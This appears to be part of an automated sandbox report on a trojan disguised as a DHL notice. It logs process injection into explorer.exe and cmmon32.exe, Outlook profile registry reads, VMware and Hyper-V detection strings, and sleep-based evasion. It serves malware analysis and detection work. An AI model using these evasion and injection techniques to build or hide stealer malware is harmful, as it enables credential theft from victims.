          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529A80 NtOpenDirectoryObject,5_2_04529A80
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529B00 NtSetValueKey,5_2_04529B00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0452A3B0 NtGetContextThread,5_2_0452A3B0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027DC870 NtClose,5_2_027DC870
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027DC840 NtDeleteFile,5_2_027DC840
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027DC920 NtAllocateVirtualMemory,5_2_027DC920
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027DC740 NtCreateFile,5_2_027DC740
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027DC7F0 NtReadFile,5_2_027DC7F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027DC73B NtCreateFile,5_2_027DC73B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027DC7EA NtReadFile,5_2_027DC7EA
          Source: DHL_Notice_pdf.exeReversingLabs: Detection: 46%
          Source: DHL_Notice_pdf.exeVirustotal: Detection: 42%
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeFile read: C:\Users\user\Desktop\DHL_Notice_pdf.exeJump to behavior
          Source: DHL_Notice_pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\DHL_Notice_pdf.exe C:\Users\user\Desktop\DHL_Notice_pdf.exe
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeProcess created: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe "C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeProcess created: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeProcess created: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe "C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.tJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeProcess created: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exeJump to behavior
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC\statecache.lockJump to behavior
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsd7F3B.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/5@14/7
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeCode function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404AB5
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6132:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: DHL_Notice_pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: cmmon32.pdb source: zkvixbqxp.exe, 00000003.00000002.274188632.0000000000920000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: zkvixbqxp.exe, 00000003.00000002.274188632.0000000000920000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: zkvixbqxp.exe, 00000001.00000003.241452408.0000000019FF0000.00000004.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000001.00000003.241643888.000000001A180000.00000004.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000002.274212822.0000000000AEF000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000003.245869729.0000000000838000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.273703792.0000000004189000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.275305652.000000000432B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: zkvixbqxp.exe, zkvixbqxp.exe, 00000003.00000002.274212822.0000000000AEF000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000003.245869729.0000000000838000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.273703792.0000000004189000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.275305652.000000000432B000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeUnpacked PE file: 3.2.zkvixbqxp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_0041B1FB push esi; iretd 3_2_0041B1FC
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_0040DAA5 push edi; retf 3_2_0040DAAE
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_0041B369 push es; retf 3_2_0041B3A3
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00422C58 push dword ptr [057DC0C6h]; ret 3_2_00422C7C
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_0041C4AA push ecx; retf 3_2_0041C4AF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_0041BDCE push esp; ret 3_2_0041BDCF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00401DF0 push eax; ret 3_2_00401DF2
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00406F32 push C87026BFh; retf 3_2_00406F37
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A4D0D1 push ecx; ret 3_2_00A4D0E4
          Source: C:\Windows\explorer.exeCode function: 4_2_0B736F57 push ebx; retn 4855h4_2_0B736F60
          Source: C:\Windows\explorer.exeCode function: 4_2_0B73213D push ds; iretd 4_2_0B732141
          Source: C:\Windows\explorer.exeCode function: 4_2_0B736EC9 push cs; retf 4_2_0B736ECA
          Source: C:\Windows\explorer.exeCode function: 4_2_1194113D push ds; iretd 4_2_11941141
          Source: C:\Windows\explorer.exeCode function: 4_2_11945EC9 push cs; retf 4_2_11945ECA
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0453D0D1 push ecx; ret 5_2_0453D0E4
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027C513F push C87026BFh; retf 5_2_027C5144
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027E0E65 push dword ptr [057DC0C6h]; ret 5_2_027E0E89
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027DA6B7 push ecx; retf 5_2_027DA6BC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027D9FDB push esp; ret 5_2_027D9FDC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027D9408 push esi; iretd 5_2_027D9409
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027CBCB2 push edi; retf 5_2_027CBCBB
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027D9576 push es; retf 5_2_027D95B0
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeJump to dropped file
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_1-518
          Source: C:\Windows\explorer.exe TID: 5172Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 5128Thread sleep time: -54000s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A26A60 rdtscp 3_2_00A26A60
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 879Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 871Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeAPI coverage: 6.5 %
          Source: C:\Windows\SysWOW64\cmmon32.exeAPI coverage: 8.4 %
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 1_2_004207DA GetSystemInfo,1_2_004207DA
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027D31A0 FindFirstFileW,FindNextFileW,FindClose,5_2_027D31A0
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-3480
          Source: explorer.exe, 00000004.00000003.473645916.000000000F4FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.514671889.000000000F4FD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW5
          Source: explorer.exe, 00000004.00000002.512635154.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
          Source: explorer.exe, 00000004.00000002.512635154.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000004.00000000.253345613.0000000007166000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000004.00000003.476512956.0000000009054000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
          Source: explorer.exe, 00000004.00000002.512635154.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
          Source: explorer.exe, 00000004.00000000.250169139.0000000005063000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
          Source: explorer.exe, 00000004.00000002.514284558.000000000F270000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWua%SystemRoot%\system32\mswsock.dllEdgeSquare44x44.pngY
          Source: explorer.exe, 00000004.00000003.476512956.0000000009054000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 1_2_00420109 mov eax, dword ptr fs:[00000030h]1_2_00420109
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 1_2_0042005F mov eax, dword ptr fs:[00000030h]1_2_0042005F
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 1_2_0042017B mov eax, dword ptr fs:[00000030h]1_2_0042017B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 1_2_0042013E mov eax, dword ptr fs:[00000030h]1_2_0042013E
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A220A0 mov eax, dword ptr fs:[00000030h]3_2_00A220A0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A390AF mov eax, dword ptr fs:[00000030h]3_2_00A390AF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2F0BF mov ecx, dword ptr fs:[00000030h]3_2_00A2F0BF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2F0BF mov eax, dword ptr fs:[00000030h]3_2_00A2F0BF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F9080 mov eax, dword ptr fs:[00000030h]3_2_009F9080
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A73884 mov eax, dword ptr fs:[00000030h]3_2_00A73884
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B8E4 mov eax, dword ptr fs:[00000030h]3_2_00A1B8E4
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F58EC mov eax, dword ptr fs:[00000030h]3_2_009F58EC
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A8B8D0 mov eax, dword ptr fs:[00000030h]3_2_00A8B8D0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A8B8D0 mov ecx, dword ptr fs:[00000030h]3_2_00A8B8D0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F40E1 mov eax, dword ptr fs:[00000030h]3_2_009F40E1
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A0B02A mov eax, dword ptr fs:[00000030h]3_2_00A0B02A
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2002D mov eax, dword ptr fs:[00000030h]3_2_00A2002D
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A830 mov eax, dword ptr fs:[00000030h]3_2_00A1A830
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A77016 mov eax, dword ptr fs:[00000030h]3_2_00A77016
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC4015 mov eax, dword ptr fs:[00000030h]3_2_00AC4015
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB2073 mov eax, dword ptr fs:[00000030h]3_2_00AB2073
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC1074 mov eax, dword ptr fs:[00000030h]3_2_00AC1074
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A10050 mov eax, dword ptr fs:[00000030h]3_2_00A10050
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A769A6 mov eax, dword ptr fs:[00000030h]3_2_00A769A6
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A261A0 mov eax, dword ptr fs:[00000030h]3_2_00A261A0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB49A4 mov eax, dword ptr fs:[00000030h]3_2_00AB49A4
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A751BE mov eax, dword ptr fs:[00000030h]3_2_00A751BE
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A199BF mov ecx, dword ptr fs:[00000030h]3_2_00A199BF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A199BF mov eax, dword ptr fs:[00000030h]3_2_00A199BF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1C182 mov eax, dword ptr fs:[00000030h]3_2_00A1C182
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2A185 mov eax, dword ptr fs:[00000030h]3_2_00A2A185
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A22990 mov eax, dword ptr fs:[00000030h]3_2_00A22990
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A841E8 mov eax, dword ptr fs:[00000030h]3_2_00A841E8
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FB1E1 mov eax, dword ptr fs:[00000030h]3_2_009FB1E1
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A14120 mov eax, dword ptr fs:[00000030h]3_2_00A14120
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A14120 mov ecx, dword ptr fs:[00000030h]3_2_00A14120
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2513A mov eax, dword ptr fs:[00000030h]3_2_00A2513A
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F9100 mov eax, dword ptr fs:[00000030h]3_2_009F9100
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B944 mov eax, dword ptr fs:[00000030h]3_2_00A1B944
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FB171 mov eax, dword ptr fs:[00000030h]3_2_009FB171
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FC962 mov eax, dword ptr fs:[00000030h]3_2_009FC962
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A0AAB0 mov eax, dword ptr fs:[00000030h]3_2_00A0AAB0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2FAB0 mov eax, dword ptr fs:[00000030h]3_2_00A2FAB0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2D294 mov eax, dword ptr fs:[00000030h]3_2_00A2D294
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F52A5 mov eax, dword ptr fs:[00000030h]3_2_009F52A5
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]3_2_00AB4AEF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]3_2_00AB4AEF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]3_2_00AB4AEF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]3_2_00AB4AEF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]3_2_00AB4AEF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]3_2_00AB4AEF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]3_2_00AB4AEF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]3_2_00AB4AEF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]3_2_00AB4AEF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]3_2_00AB4AEF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]3_2_00AB4AEF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]3_2_00AB4AEF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]3_2_00AB4AEF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]3_2_00AB4AEF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A22AE4 mov eax, dword ptr fs:[00000030h]3_2_00A22AE4
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A22ACB mov eax, dword ptr fs:[00000030h]3_2_00A22ACB
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A229 mov eax, dword ptr fs:[00000030h]3_2_00A1A229
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A229 mov eax, dword ptr fs:[00000030h]3_2_00A1A229
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A229 mov eax, dword ptr fs:[00000030h]3_2_00A1A229
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A229 mov eax, dword ptr fs:[00000030h]3_2_00A1A229
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A229 mov eax, dword ptr fs:[00000030h]3_2_00A1A229
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A229 mov eax, dword ptr fs:[00000030h]3_2_00A1A229
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A229 mov eax, dword ptr fs:[00000030h]3_2_00A1A229
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A229 mov eax, dword ptr fs:[00000030h]3_2_00A1A229
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A229 mov eax, dword ptr fs:[00000030h]3_2_00A1A229
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FAA16 mov eax, dword ptr fs:[00000030h]3_2_009FAA16
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FAA16 mov eax, dword ptr fs:[00000030h]3_2_009FAA16
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A34A2C mov eax, dword ptr fs:[00000030h]3_2_00A34A2C
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A34A2C mov eax, dword ptr fs:[00000030h]3_2_00A34A2C
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F5210 mov eax, dword ptr fs:[00000030h]3_2_009F5210
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F5210 mov ecx, dword ptr fs:[00000030h]3_2_009F5210
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F5210 mov eax, dword ptr fs:[00000030h]3_2_009F5210
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F5210 mov eax, dword ptr fs:[00000030h]3_2_009F5210
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B236 mov eax, dword ptr fs:[00000030h]3_2_00A1B236
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B236 mov eax, dword ptr fs:[00000030h]3_2_00A1B236
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B236 mov eax, dword ptr fs:[00000030h]3_2_00A1B236
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B236 mov eax, dword ptr fs:[00000030h]3_2_00A1B236
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B236 mov eax, dword ptr fs:[00000030h]3_2_00A1B236
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B236 mov eax, dword ptr fs:[00000030h]3_2_00A1B236
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A08A0A mov eax, dword ptr fs:[00000030h]3_2_00A08A0A
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A13A1C mov eax, dword ptr fs:[00000030h]3_2_00A13A1C
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00ABAA16 mov eax, dword ptr fs:[00000030h]3_2_00ABAA16
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00ABAA16 mov eax, dword ptr fs:[00000030h]3_2_00ABAA16
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AAB260 mov eax, dword ptr fs:[00000030h]3_2_00AAB260
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AAB260 mov eax, dword ptr fs:[00000030h]3_2_00AAB260
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC8A62 mov eax, dword ptr fs:[00000030h]3_2_00AC8A62
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A3927A mov eax, dword ptr fs:[00000030h]3_2_00A3927A
